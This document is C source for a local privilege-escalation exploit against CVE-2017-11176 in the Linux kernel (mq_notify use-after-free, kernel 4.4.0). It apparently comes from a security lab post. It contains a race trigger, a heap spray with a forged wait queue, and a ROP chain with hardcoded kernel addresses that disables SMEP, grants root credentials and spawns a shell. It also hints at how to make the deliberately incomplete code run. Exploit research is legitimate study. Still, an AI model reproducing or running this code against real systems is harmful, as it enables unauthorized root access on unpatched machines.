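(One structure has been removed from the final exp; add it back and it will run.)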
//gcc -O0 -pthread exploit-2017-11176.c
//linux 4.4.0
//commit afd2ff9b7e1b367172f18ba7f693dfb62bdcb2dc
#define _GNU_SOURCE
#include <stdio.h>
#include <mqueue.h>
#include <asm/types.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#include <linux/netlink.h>
#include <pthread.h>
#include <errno.h>
#include <sys/mman.h>
#include <stdbool.h>
#include <sys/ioctl.h>
#include <sys/un.h>
#include <asm/types.h>
#include <sched.h>
#define SOL_NETLINK 270
#define NOTIFY_COOKIE_LEN 32
#define _mq_notify(mqdes, sevp) syscall(__NR_mq_notify, mqdes, sevp)
#define _socket(domain, type, protocol) syscall(__NR_socket, domain, type, protocol)
#define _setsockopt(fd, level, optname, optval, optlen) syscall(__NR_setsockopt, fd, level, optname, optval, optlen)
#define _dup(fd) syscall(__NR_dup, fd)
#define _close(fd) syscall(__NR_close, fd)
#define _bind(recv_fd, addr, len) syscall(__NR_bind, recv_fd, addr, len)
#define _sendmsg(sockfd, msg, flags) syscall(__NR_sendmsg, sockfd, msg ,flags)
#define _connect(sockfd, addr, addrlen) syscall(__NR_connect, sockfd, addr, addrlen)
#define _getpid() syscall(__NR_getpid)
#define _sched_setaffinity(pid, cpusetsize, mask) syscall(__NR_sched_setaffinity, pid, cpusetsize, mask)
typedef int __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred);
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)0xffffffff81074380;
_commit_creds commit_creds = (_commit_creds)0xffffffff81073ff0;
void get_root() {
commit_creds(prepare_kernel_cred(0));
}
size_t user_cs, user_ss, user_rflags, user_sp;
struct unblock_thread_arg {
int fd;
int unblock_fd;
bool ok;
};
void migrate_to_cpu0() {
cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(0,&set);
if (_sched_setaffinity(_getpid(), sizeof(set), &set) == -1){
perror("sched_setaffinity wrong");
exit(-1);
}
}
int prepare(){
char iov_base[1024];
int send_fd = -1;
int recv_fd = -1;
int least_size = 0;
struct iovec iov;
iov.iov_base = iov_base;
iov.iov_len = sizeof(iov_base);
struct sockaddr_nl addr;
addr.nl_family = AF_NETLINK;
addr.nl_pid = 11;
addr.nl_groups = 0;
addr.nl_pad = 0;
struct msghdr msg;
msg.msg_name = &addr;
msg.msg_namelen = sizeof(addr);
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = NULL;
msg.msg_controllen = 0;
msg.msg_flags = 0;
puts("Start poc");
if ((send_fd = _socket(AF_NETLINK, SOCK_DGRAM, NETLINK_USERSOCK)) < 0 || (recv_fd = _socket(AF_NETLINK, SOCK_DGRAM, NETLINK_USERSOCK)) < 0){
perror("socket wrong");
exit(-1);
}
printf("send_fd:%d, recv_fd:%d\n", send_fd, recv_fd);
while(_bind(recv_fd, (struct sockaddr*)&addr, sizeof(addr))){
perror("bind pid");
addr.nl_pid++;
}
if (_connect(send_fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
perror("connect wrong");
exit(-1);
}
printf("netlink socket (nl_pid=%d)\n",addr.nl_pid);
if (_setsockopt(recv_fd, SOL_SOCKET, SO_RCVBUF, &least_size, sizeof(least_size)) < 0)
perror("setsockopt wrong");
puts("REVBUF reduced");
while (_sendmsg(send_fd, &msg, MSG_DONTWAIT) > 0);
if (errno != EAGAIN){
perror("sendmsg wrong");
exit(-1);
}
puts("Flooding full");
_close(send_fd);
return recv_fd;
}
static void *unblock_thread(void *arg)
{
int optlen = sizeof(int);
int optval = 0x1000;
struct unblock_thread_arg *para = (struct unblock_thread_arg *) arg;
para->ok = true;
sleep(3);
printf("close sock_fd:%d\n",para->fd);
_close(para->fd);
puts("start to unblock");
if (_setsockopt(para->unblock_fd, SOL_NETLINK, NETLINK_NO_ENOBUFS, &optval, optlen) < 0) {
perror("setsockopt wrong");
exit(-1);
}
puts("unblocked");
return NULL;
}
static int vuln(int fd,int unblock_fd)
{
struct unblock_thread_arg arg;
struct sigevent sigv;
pthread_t tid;
char user_buf[NOTIFY_COOKIE_LEN];
memset(&arg,0,sizeof(arg));
arg.ok = false;
arg.fd = fd;
arg.unblock_fd = unblock_fd;
if (pthread_create(&tid,NULL,unblock_thread,&arg) < 0)
{
perror("unblock thread create wrong");
exit(-1);
}
while(arg.ok == false);
printf("sock_fd:%d, unblock_fd:%d\n", fd, unblock_fd);
memset(&sigv,0,sizeof(sigv));
sigv.sigev_signo = fd;
sigv.sigev_notify = SIGEV_THREAD;
sigv.sigev_value.sival_ptr = user_buf;
_mq_notify((mqd_t)-1,&sigv);
}
typedef int (*wait_queue_func_t)(void *wait, unsigned mode, int flags, void *key);
struct wait_queue_t
{
unsigned int flag;
void *private;
wait_queue_func_t func;
struct list_head task_list;
};
struct sk_security_struct {
enum { /* NetLabel state */
NLBL_UNSET = 0,
NLBL_REQUIRE,
NLBL_LABELED,
NLBL_REQSKB,
NLBL_CONNLABELED,
} nlbl_state;
void *nlbl_secattr; /* NetLabel sec attributes */
__u32 sid; /* SID of this object */
__u32 peer_sid; /* SID of peer */
__u16 sclass; /* sock security class */
};
void get_shell() {
system("/bin/sh");
}
struct spray_thread_arg
{
pthread_t tid;
int send_fd;
struct msghdr *msg;
int flag;
};
static void *heap_spray(void *arg)
{
struct spray_thread_arg *para = (struct spray_thread_arg *) arg;
puts("heap spray");
_sendmsg(para->send_fd, para->msg, para->flag);
puts("not block");
return NULL;
}
void exploit() {
int send_fd = -1;
int recv_fd = -1;
puts("Start exploit");
if ((send_fd = _socket(AF_UNIX, SOCK_DGRAM, 0)) < 0 || (recv_fd = _socket(AF_UNIX, SOCK_DGRAM, 0)) < 0){
perror("heap socket wrong");
exit(-1);
}
printf("heap: send_fd:%d, recv_fd:%d\n", send_fd, recv_fd);
struct sockaddr_un ser;
ser.sun_family = AF_UNIX;
strcpy(ser.sun_path,"@addr");
ser.sun_path[0] = 0;
if (_bind(recv_fd, (struct sockaddr *)&ser, sizeof(ser)) < 0) {
perror("heap bind wrong");
exit(-1);
}
if (_connect(send_fd, (struct sockaddr *)&ser, sizeof(ser)) < 0) {
perror("heap connect wrong");
exit(-1);
}
puts("layout");
char buf[1024];
memset(buf, 0, sizeof(buf));
struct cmsghdr *pbuf;
pbuf = (struct cmsghdr *)buf;
pbuf->cmsg_len = sizeof(buf);
pbuf->cmsg_level = 0;
pbuf->cmsg_type = 1;
struct sk_security_struct secur;
memset(&secur, 0, sizeof(secur));
secur.sid = 1;
*(size_t *)((size_t)buf + 0x278) = (size_t)(&(secur));
struct wait_queue_t uwq;
memset(&uwq, 0xac, sizeof(uwq));
uwq.flag = 0x01;
uwq.func = (void *)0xffffffff8100008a; //xchg eax, esp ; ret
uwq.task_list.prev = (void *)&(uwq.task_list.next);
uwq.task_list.next = (void *)&(uwq.task_list.next);
printf("buf: %p, uwq: %p\n", buf, &(uwq.task_list.next));
*(unsigned long *)((size_t)buf + 0x2f8) = (size_t)(&(uwq.task_list.next));//netlink_sock->wait->next
*(unsigned long *)((size_t)buf + 0x300) = (size_t)(&(uwq.task_list.next));//netlink_sock->wait->prev
struct iovec iov;
char iovbuf[10];
iov.iov_base = iovbuf;
iov.iov_len = sizeof(iovbuf);
struct msghdr msg;
memset(&msg, 0, sizeof(msg));
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
puts("distribute");
size_t *p = (size_t *)(((size_t)&uwq) & 0xffffffff);
printf("wait_queue_t: 0x%lx\n",(size_t)&p);
mmap(p, 0x2000, 7, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
user_sp = (size_t)p;
size_t rop[30] = {0};
int r = 0;
rop[r++] = 0xffffffff8131e2ef; //pop rdi ; ret
rop[r++] = 0x6f0;
rop[r++] = 0xffffffff810464d4; //mov cr4, rdi ; pop rbp ; ret
rop[r++] = 0x0;
rop[r++] = (size_t)get_root;
rop[r++] = 0xffffffff810465b4; //swapgs ; pop rbp ; ret
rop[r++] = user_sp;
rop[r++] = 0xffffffff81034740; //iretq ;
rop[r++] = (size_t)get_shell;
rop[r++] = user_cs;
rop[r++] = user_rflags;
rop[r++] = user_sp;
rop[r++] = user_ss;
memcpy(p, rop, sizeof(rop));
struct timeval tv;
memset(&tv, 0, sizeof(tv));//tv_sec and tv_usec are both 0
if (_setsockopt(send_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv))) {
perror("timeo setsockopt wrong");
exit(-1);
}
while(_sendmsg(send_fd, &msg, MSG_DONTWAIT) > 0);
if (errno != EAGAIN) {
perror("heap sendmsg wrong");
exit(-1);
}
puts("ready to spray");
msg.msg_control = buf;
msg.msg_controllen = sizeof(buf);
struct spray_thread_arg arg[20];
for (int i=0; i<15; i++) {
*(unsigned int *)((size_t)buf + 0x2c0) = 0x12345000+i;//netlink_sock->portid
*(unsigned long *)((size_t)buf + 0x2d8) = 0;//netlink_sock->groups
arg[i].send_fd = _dup(send_fd);
arg[i].flag = 0;
arg[i].msg = &msg;
if (pthread_create(&arg[i].tid, NULL, heap_spray, &arg) < 0) {
perror("heap pthread wrong");
exit(-1);
}
}
puts("spray ends");
}
void save_state() {
asm(
"movq %%cs, %0\n"
"movq %%ss, %1\n"
"pushfq\n"
"popq %2\n"
:"=r"(user_cs), "=r"(user_ss), "=r"(user_rflags)
:
:"memory"
);
}
int main()
{
migrate_to_cpu0();
int sock_fd1=0;
int sock_fd2=0;
int unblock_fd=0;
save_state();
if ((sock_fd1 = prepare()) < 0){
perror("sock_fd");
exit(-1);
}
sock_fd2 = _dup(sock_fd1);
unblock_fd = _dup(sock_fd1);
puts("dup succeed");
vuln(sock_fd1,unblock_fd);
vuln(sock_fd2,unblock_fd);
exploit();
sleep(5);
puts("fake wake");
int optval = 0x1000;
_setsockopt(unblock_fd, SOL_NETLINK, NETLINK_NO_ENOBUFS, &optval, sizeof(optval));
return 0;
}
References
- https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part3.html
- https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part4.html
- https://www.cnblogs.com/Cqlismy/p/11359196.html
Team information
Qi An Xin Pangu Shi Forensics Lab is recruiting mobile vulnerability researchers and reverse engineers, based in Shanghai.